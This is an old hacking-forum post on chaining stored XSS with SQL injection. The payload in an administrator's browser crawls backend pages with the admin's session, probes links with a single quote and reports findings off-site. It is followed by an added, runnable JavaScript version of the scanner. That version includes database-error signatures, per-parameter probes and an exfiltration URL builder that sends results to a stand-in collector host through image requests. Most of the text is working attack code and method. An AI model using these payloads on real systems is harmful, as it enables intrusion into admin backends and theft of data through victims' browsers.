Administrator

Number of posts: 83 Age: 35 Localisation: USA Registration date: 2007-05-28
Subject: Sql-Injection in XSS    Wed Dec 26, 2007 4:51 pm
SQL INJECTION IN XSS
1. Privilege restrictions always make people feel safe: the backend is only reachable from the intranet, for example. Still, it cannot be denied that some programs have risky holes in the backend (the data-backup function of vbbs, for instance, can be used to get a shell). Inside the restricted zone such holes are indeed hard to use directly. XSS, on the other hand, is something programmers often overlook and defend poorly. When the two conditions coincide, the difficulty of exploitation drops sharply.
2. Some will say that the XSS can simply "hijack" the cookie and inherit the privileges directly, for example by logging straight into the backend. That is indeed a good method, but many backends now also check the client IP. So instead we can use the XSS to have the administrator's own browser carry out a series of attacks against the backend automatically, SQL injection among them.
3. For open-source programs you can write HTML/JS that attacks the known backend functions automatically, but what if the backend is a complete black box?
SIX (SQL Injection in XSS) principle:
1. The flow of the attack:

   Hacker ----> front end (XSS planted where the administrator will see it)
                    |
                    v
              Administrator (the payload runs in the admin's browser)
                    |
                    v
                Backend (requested with the admin's own session and IP)

2. xmlhttp quietly runs your code for you. Luoluo wrote "a simple XmlHttp wrapper"; code: http://pstgroup.blogspot.com/2007/08/javascript.html
SIX in use:
1. Crawl the backend URLs with the following code:
// XmlHttp is Luoluo's wrapper from the link above: init() sets the object up,
// get(url, callback) fetches url and hands the response text to callback.
var xmlhttp = new XmlHttp();
if (xmlhttp.init()) {
    xmlhttp.get("http://localhost:808/index.php", function (s) {
        // The administrator is logged in, so the front page is fetched with the
        // admin's session and every link into the backend (admin/index.php and
        // the like) is collected. The original pattern was lost; a generic href
        // matcher stands in for it.
        var re = /href=["']?([^"'\s>]+)/gi;
        var m = null;
        while ((m = re.exec(s)) != null) {
            alert(m[1]);
            // In reality write a function that sends this data out and stores it;
            // xmlhttp cannot be used for that, because xmlhttp does not cross domains.
            SendUrl(m[1]);
        }
    });
}
2. Scan each crawled backend URL for an injection point with the following code:
var xmlhttp = new XmlHttp();
if (xmlhttp.init()) {
    xmlhttp.get("http://localhost:808/admin/index.php", function (s) {
        // Same link matcher as above (the original pattern was lost).
        var re = /href=["']?([^"'\s>]+)/gi;
        var m = null;
        while ((m = re.exec(s)) != null) {
            var probe = new XmlHttp();
            if (probe.init()) {
                // Append a single quote to the link and request it.
                probe.get(m[1] + "'", function (s1) {
                    if (s1 != null) {
                        alert(s1);
                        SendUrl(s1);
                    }
                });
            }
            // alert(m[1]);
        }
    });
}
This simply appends a ' to each backend link to detect injection.
3. Code to carry out the attack once an injection point is found: not available yet.
The code is written very roughly; to do this properly a lot more work is needed.
SIX on the intranet: many intranet web applications cannot be reached from the outside at all. To do SIX against the intranet, the problem to solve is cross-domain access:
1. img, iframe, script tags and the like can cross domains.
2. xmlhttp cannot cross domains, but some cross-domain vulnerabilities allow it to.
Steps:
(1) Port scanning. JavaScript-based port scanner: http://www.securiteam.com/exploits/5DP010KJFE.html  Flash port scanner: http://scan.flashsec.org/classes/Main.as
(2) Crawl the backend URLs, scan them for injection points and attack. This is hard to do with img/iframe/script tags alone, and the xmlhttp code above cannot cross domains by itself, so a cross-domain vulnerability is needed [is looking for cross-domain ActiveX controls a good direction?].
(3) Overflow in XSS [OIX] (a digression): if we can cross domains, xmlhttp can be used to send overflow payloads directly to the ftp/http servers on the intranet; img, iframe, script tags and so on can also trigger URL-based overflows in some http/ftp servers. It depends on the specific circumstances.
_________________
By M4st3r.w4n1
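The crawl, probe and report steps from the "SIX in use" section, written out as an added example that is not part of the original post and does not use Luoluo's XmlHttp wrapper. It is plain JavaScript run against a constructed stand-in site (localhost:808 as in the post, an /admin/ backend, a collector at attacker.invalid) so it executes in Node without a browser; the fetch function is a stand-in for the synchronous XMLHttpRequest the payload would use in the administrator's browser, and the error signatures, parameter names and fake responses are assumptions made for the example.

```javascript
// Added example, not code from the original post. It turns the three SIX steps
// into testable functions: (1) crawl the backend links the logged-in admin can
// reach, (2) append a single quote to each query parameter and look for a
// database error, (3) carry each finding out of the origin. URLs, names and the
// fake site below are constructed; the signatures are common MySQL/MSSQL/Oracle
// error messages.

const SQL_ERROR_SIGNATURES = [
  /You have an error in your SQL syntax/i,                // MySQL
  /Warning: mysql_/i,                                      // PHP mysql_* extension
  /Unclosed quotation mark after the character string/i,   // MSSQL
  /ORA-\d{5}/,                                             // Oracle
];

// Step 1: absolute links in `html` that fall under `backendPrefix`.
function extractBackendLinks(html, baseUrl, backendPrefix) {
  const re = /href\s*=\s*["']?([^"'\s>]+)/gi;
  const links = new Set();
  let m;
  while ((m = re.exec(html)) !== null) {
    let abs;
    try { abs = new URL(m[1], baseUrl).toString(); } catch (e) { continue; }
    if (abs.startsWith(backendPrefix)) links.add(abs);
  }
  return [...links];
}

// Step 2a: one probe per query parameter, with "'" appended to its value
// (the post's test, applied per parameter instead of to the whole URL).
function buildProbes(link) {
  const probes = [];
  for (const [name, value] of new URL(link).searchParams) {
    const p = new URL(link);
    p.searchParams.set(name, value + "'");
    probes.push({ param: name, url: p.toString() });
  }
  return probes;
}

// Step 2b: did the quote break the query? Only verbose backends show this.
function looksLikeSqlError(body) {
  return typeof body === "string" && SQL_ERROR_SIGNATURES.some((re) => re.test(body));
}

// Step 3: XMLHttpRequest cannot leave the origin, but an image load can, so the
// finding travels in the query string of a URL meant for `new Image().src`.
function buildExfilUrl(collector, finding) {
  const u = new URL(collector);
  u.searchParams.set("u", finding.url);
  u.searchParams.set("p", finding.param);
  return u.toString();
}

// Driver for the payload in the admin's browser. fetchFn(url) returns the body
// as a string (a synchronous XMLHttpRequest there, fakeFetch here); report(url)
// receives each exfil URL (in the browser: new Image().src = url).
function scanBackend({ frontUrl, backendPrefix, collector, fetchFn, report }) {
  const findings = [];
  const seen = new Set();
  for (const link of extractBackendLinks(fetchFn(frontUrl), frontUrl, backendPrefix)) {
    const page = fetchFn(link);                                      // one level deeper
    for (const target of [link, ...extractBackendLinks(page, link, backendPrefix)]) {
      if (seen.has(target)) continue;
      seen.add(target);
      for (const probe of buildProbes(target)) {
        if (looksLikeSqlError(fetchFn(probe.url))) {
          findings.push(probe);
          report(buildExfilUrl(collector, probe));
        }
      }
    }
  }
  return findings;
}

// Constructed stand-in for the victim site: a front page linking into /admin/,
// and a backend whose view.php concatenates `id` into SQL without escaping.
const FAKE_SITE = {
  "http://localhost:808/index.php":
    '<a href="/news.php?id=1">News</a> <a href="/admin/index.php">Admin</a>',
  "http://localhost:808/admin/index.php":
    '<a href="view.php?id=7&page=1">Posts</a> <a href=\'users.php?uid=3\'>Users</a>',
};

function fakeFetch(url) {
  if (url in FAKE_SITE) return FAKE_SITE[url];
  const u = new URL(url);
  if (u.pathname === "/admin/view.php" && (u.searchParams.get("id") || "").includes("'")) {
    return "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version";
  }
  return "<html>ok</html>";
}

function demo() {
  const sent = [];                                 // what the "image" loads would carry
  const findings = scanBackend({
    frontUrl: "http://localhost:808/index.php",
    backendPrefix: "http://localhost:808/admin/",
    collector: "http://attacker.invalid/c.php",    // constructed collector
    fetchFn: fakeFetch,
    report: (u) => sent.push(u),
  });
  return { findings, sent };
}
```

In the browser the report callback would be `new Image().src = url`, which is the cross-domain channel the post alludes to when it says xmlhttp cannot send the data out but img can. The oracle here is a visible database error, so a backend that suppresses errors needs a different one (a boolean or timing difference between `'` and `''`, for instance), and the probe only exercises GET parameters; forms posted by the backend are not covered.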